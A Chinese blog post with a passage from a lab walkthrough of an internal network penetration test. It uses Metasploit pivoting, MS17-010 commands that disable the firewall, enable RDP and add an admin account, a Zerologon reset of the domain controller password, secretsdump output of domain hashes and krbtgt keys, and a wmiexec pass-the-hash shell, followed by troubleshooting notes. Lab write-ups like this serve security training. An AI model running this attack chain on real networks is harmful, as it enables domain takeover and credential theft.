✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

攻击上线

msf(添加路由+挂代理)

挂代理前必须加路由,msf模块post/multi/manage/autoroute

meterpreter > run autoroute -s 192.168.52.0/24 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x64_Win
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 4

meterpreter > bg
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > 

msf模块auxiliary/server/socks_proxy添加代理,run启动。

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > 

jobs查看代理已挂起,根据上面的配置编辑文件/etc/proxychains4.conf

msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

msf6 auxiliary(server/socks_proxy) >  vi /etc/proxychains4.conf
[*] exec:  vi /etc/proxychains4.conf
proxychains nmap 扫描

proxychains nmap 192.168.52.138 -sT全扫描,但是比较慢,这里只对常见端口进行扫描

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.138

在这里插入图片描述
也可以另开一个终端进行proxychains nmap扫描
在这里插入图片描述

域成员 ms17-010
msf 永恒之蓝
msf6 auxiliary(server/socks_proxy) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(multi/handler) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > options
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.141
msf6 auxiliary(admin/smb/ms17_010_command) > set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
msf6 auxiliary(admin/smb/ms17_010_command) > run
msf6 auxiliary(admin/smb/ms17_010_command) > set command netsh advfirewall set allprofiles state off
msf6 auxiliary(admin/smb/ms17_010_command) > run

在这里插入图片描述

rdesktop登录上线
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.52.141

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Win7远程桌面上线

也可以利用ms17-010的command 模块,创建一个账户hack02,然后在win7内使用远程桌面上线。

set command net user hack02 hack@test2003 /add
set command net localgroup administrators hack02 /add

在这里插入图片描述
在这里插入图片描述

域控CVE-2020-1472
域控密码置空

Zerologon 漏洞允许攻击者将域控制器的计算机账户密码重置为空,从而可能获得对域控制器的控制权。
zerologon下载: https://codeload.github.com/risksense/zerologon/zip/refs/heads/master

┌──(root㉿kali)-[~]
└─# cd  Desktop 
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop]
└─# unzip zerologon-master.zip 
Archive:  zerologon-master.zip
   creating: zerologon-master/
  inflating: zerologon-master/LICENSE  
  inflating: zerologon-master/README.md  
  inflating: zerologon-master/reinstall_original_pw.py  
  inflating: zerologon-master/requirements.txt  
  inflating: zerologon-master/set_empty_pw.py  
  inflating: frp_0.44.0_linux_amd64.tar.gz  
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop]
└─# cd zerologon-master 
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# ls
LICENSE  README.md  reinstall_original_pw.py  requirements.txt  set_empty_pw.py
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─#  python3 set_empty_pw.py owa 192.168.52.138
Performing authentication attempts...
===========================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'z\xb8\xea,\xaf1\xd2U' 
NegotiateFlags:                  556793855 
AccountRid:                      1001 
ErrorCode:                       0 


server challenge b'z\x19\x8f_\x00\x07\x1b\x07'
NetrServerPasswordSet2Response 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b'\x01i\xb7Y\xff\x97Lm' 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC should now have the empty string as its machine password.
        

尝试将目标域控制器(IP 地址为 192.168.52.138)的机器账户密码设置为空,这里的目标是域控制器的ip,结果Success!
域控密码成功置为空。

在这里插入图片描述

┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'god.org/owa$@192.168.52.138'                                                                      
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x980de85005a72e9a8d7c401ee3d2363b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e8b24e00bd703e52cfe327a072006b0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
GOD\OWA$:aes256-cts-hmac-sha1-96:1761a1694ad74bbf1065b690c1a7d48f8020a07ac4163ad3fcdce1175d9d638f
GOD\OWA$:aes128-cts-hmac-sha1-96:7fd222a440e9a2359f41d472740c63bc
GOD\OWA$:des-cbc-md5:94795be0d0e516fe
GOD\OWA$:plain_password_hex:060e115dd4087c00981fa99cd9aefe65f1ffabe5bf20bd38873f30a0dc9def82ebe3af6764aba8746923405e2a0260b4c69f9271f7fe2ce0ebf46c69eabdca13c4900796526d580a6e6cbccef754e4a2a597141475c80570dbd96dea530bc9c027cfce4ed94f37202a427c2f632342eaa561432487fa909c5995696b941dc3acbbcadca9f282e40b4b0577e8ca472cccea0042e53f2f0a510372f950cf295fcd7d38de07e77c918f42e7d93fb7bfb0240f91694632554948a79c865717290d7fc4c8f17bf64f10844fcc2e5d0530d0d8ba304031a473f66baed901c30558f7ff78900f95958521d5dfedc34d5afd210b
GOD\OWA$:aad3b435b51404eeaad3b435b51404ee:19e4410dee5e1007bd435430491222b9:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x99a225f950e4b443c3104fd8decefa12f0ad7f53
dpapi_userkey:0x93c6670d6c538e0c31ed6a8bcf74550f46961386
[*] NL$KM 
 0000   25 43 63 20 92 1D 93 C5  E7 9E 92 E4 78 7D 3F D0   %Cc ........x}?.
 0010   44 7F 4E C2 C3 43 DF E2  6E 44 FD FF 36 D6 5F 4D   D.N..C..nD..6._M
 0020   9C E9 83 07 84 42 BF A7  91 59 4E 51 FE 4E 76 89   .....B...YNQ.Nv.
 0030   E1 99 3C 62 E4 CC 74 71  42 F8 86 02 BD A6 E8 87   ..<b..tqB.......
NL$KM:25436320921d93c5e79e92e4787d3fd0447f4ec2c343dfe26e44fdff36d65f4d9ce983078442bfa791594e51fe4e7689e1993c62e4cc747142f88602bda6e887
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:db4371323f83b0ad7f16ea72eb1fcd73:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:4a549006cbb3489f8ed040e2771a5a14:::
god.org\ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ROOT-TVI862UBEH$:1104:aad3b435b51404eeaad3b435b51404ee:d67367ecf4bb9c01d2043539d11c75dd:::
STU1$:1105:aad3b435b51404eeaad3b435b51404ee:889a6931bb99725d146c68fa1b90dd44:::
DEV1$:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9fb9ae5428f46b8ef7f4d5ebbb113aaa2809e311530ae71a7858c89610328f79
Administrator:aes128-cts-hmac-sha1-96:cdfc9aa494972729d7ee328bfdecc30c
Administrator:des-cbc-md5:76ad1592498ace10
Administrator:rc4_hmac:db4371323f83b0ad7f16ea72eb1fcd73
krbtgt:aes256-cts-hmac-sha1-96:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
krbtgt:aes128-cts-hmac-sha1-96:2e35721544960f553afcba54252d7b13
krbtgt:des-cbc-md5:8cc1019b7ccd1319
krbtgt:rc4_hmac:58e91a5ac358d86513ab224312314061
liukaifeng01:aes256-cts-hmac-sha1-96:bef65a270d26f26117069b5dd6a381709ee0c61ec0ef1a9e233c2a47540361f6
liukaifeng01:aes128-cts-hmac-sha1-96:13e2af34958886c3d8a173ce7363f53d
liukaifeng01:des-cbc-md5:7f4aefadfef22325
liukaifeng01:rc4_hmac:4a549006cbb3489f8ed040e2771a5a14
god.org\ligang:aes256-cts-hmac-sha1-96:6c64f4839c02b73f7604fb86dfc3f015acbf3b9c82cc8c302b463ae1e6962d82
god.org\ligang:aes128-cts-hmac-sha1-96:587d041a1163870abc419487cea00e04
god.org\ligang:des-cbc-md5:57760e974551d592
god.org\ligang:rc4_hmac:1e3d22f88dfd250c9312d21686c60f41
OWA$:aes256-cts-hmac-sha1-96:ef4ee190931baf3a4d52637f865e1038dabc4dae790917e82644d259b49bfa8b
OWA$:aes128-cts-hmac-sha1-96:05eaf94d27ad24e849b83568e60e8ab3
OWA$:des-cbc-md5:ad0eaef73120f4ab
OWA$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0
ROOT-TVI862UBEH$:aes256-cts-hmac-sha1-96:202aee0a4adcdf969cf370d11e5ebf598e2d3601b747c1ed8097bfd7a23c2aa7
ROOT-TVI862UBEH$:aes128-cts-hmac-sha1-96:3cbaa0f7a146cd39cb1e6cc6690a6c71
ROOT-TVI862UBEH$:des-cbc-md5:6e52109d15ef7062
ROOT-TVI862UBEH$:rc4_hmac:d67367ecf4bb9c01d2043539d11c75dd
STU1$:aes256-cts-hmac-sha1-96:485c5313137469ea70e426526fc944d90708b5ff3fedcb7006d4c967d3d70fb4
STU1$:aes128-cts-hmac-sha1-96:f26fd290ac58a8d8665c6935f5cb7a92
STU1$:des-cbc-md5:cdd019cefd76f2a8
STU1$:rc4_hmac:889a6931bb99725d146c68fa1b90dd44
DEV1$:aes256-cts-hmac-sha1-96:4e724c5cfb62bcab5e6baa5a5a36d638568dd5d91ee4a311c1feb4f5e40849ce
DEV1$:aes128-cts-hmac-sha1-96:9c68d7e02dac2dc0fa0f7aebfdbd1afb
DEV1$:des-cbc-md5:f8efa87a02802532
DEV1$:rc4_hmac:bed18e5b9d13bb384a3041a10d43c01b
[*] Cleaning up... 
                         

将密码设置为空串31d6cfe0d16ae931b73c59d7e0c089c0

在这里插入图片描述

wmiexec.py上线

wmiexec.py:通过Windows Management Instrumentation使用的半交互式shell,它不需要在目标服务器上安装任何服务/代理,以管理员身份运行,非常隐蔽。

┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 23605, done.
remote: Counting objects: 100% (181/181), done.
remote: Compressing objects: 100% (130/130), done.
remote: Total 23605 (delta 97), reused 102 (delta 51), pack-reused 23424
Receiving objects: 100% (23605/23605), 10.24 MiB | 2.00 MiB/s, done.
Resolving deltas: 100% (17887/17887), done.
                                                                                                                                                                                  
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# cd impacket        
                                                                                                                                                                                                                                                                                                                                                                             
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket]
└─# python setup.py install
                                                                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket]
└─# cd examples                                                                                                                      
                                                                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket/examples]
└─# python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:db4371323f83b0ad7f16ea72eb1fcd73 god.org/administrator@192.168.52.138
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
god\administrator

C:\>net user /domain
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec

\\ ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
ligang                   liukaifeng01             
����������ϣ�������һ����������


C:\>hostname
owa

在这里插入图片描述

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

亿些问题

shell.php没有东西

问题:
在这里插入图片描述
解决:日志功能未开启,OFF,执行sql开启ON

蚁剑中文乱码

问题:
在这里插入图片描述
解决: chcp 65001
在这里插入图片描述
然并卵,解决不了,换哥斯拉了。

yxsms登录

问题:网站页面点登录,进不去。
在这里插入图片描述
解决:url错了,这个属于用户登录界面,不是进后台的。

hack01无法查询domain

问题:
在这里插入图片描述
解决:瞎啊,提示不是说了吗,hack01没有域内权限啊,hack01是本地的管理员,权限仅限本机,不包括域内。

添加域内用户

问题:
在这里插入图片描述
解决:添加域成员,要拿下域控,在域控制器上才能添加。

上传的fcan无法执行

问题:
在这里插入图片描述
解决:可能是版本不对,也可能没有权限,也可能被杀了,略过,下载到win10就会报毒,被杀概率大一点。

/smb/psexec 打不通

138打不通
在这里插入图片描述
141也打不通
在这里插入图片描述
解决:世上无难事,只要肯放弃。

永恒之蓝smb报错

问题:[-] 192.168.52.138:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
在这里插入图片描述
解决:好像没设置SMBDomain User Pass,后面设置了,也没啥用,放弃、

impacket工具包下载安装

问题:谢公子这篇文章的指令git clone拉不了
在这里插入图片描述
在这里插入图片描述
解决:git clone https://github.com/SecureAuthCorp/impacket.git

玄学问题

问题:调用永恒之蓝(use exploit/windows/smb/ms17_010_eternalblue)的模块中出现Died的字样,执行的时候出现time out的字样。
在这里插入图片描述
138 => time out
在这里插入图片描述
141 => time out
在这里插入图片描述
分析:

这里执行上线有三个前提:

  1. kail和win7的shell连接不能断开:
  • use exploit/multi/handler 回连马连接
  • autoroute -s 192.168.52.0/24 加路由
  • bg放后台
  1. msf开启了代理
  • use auxiliary/server/socks_proxy 配置代理
  • jobs 查看启动的代理
  1. kail的代理已开
  • vi /etc/proxychains4.conf

如果在调用永恒之蓝(use exploit/windows/smb/ms17_010_eternalblue)的模块中出现Died的字样,表示bg的会话断开,需要重新连接,添加路由,bg放后台,使用use auxiliary/server/socks_proxy,配置代理run,jobs查看代理确保已开启。

结果:没打通,timeout解决又出了别的问题,属于一个bug解决了另一个bug又出现了,但是我看有的up视频确实靠ms17-0101执行成功了,所以最后,我决定将这个问题归于玄学,放过自己,做条咸鱼~~

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

参考资料

  • 16
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值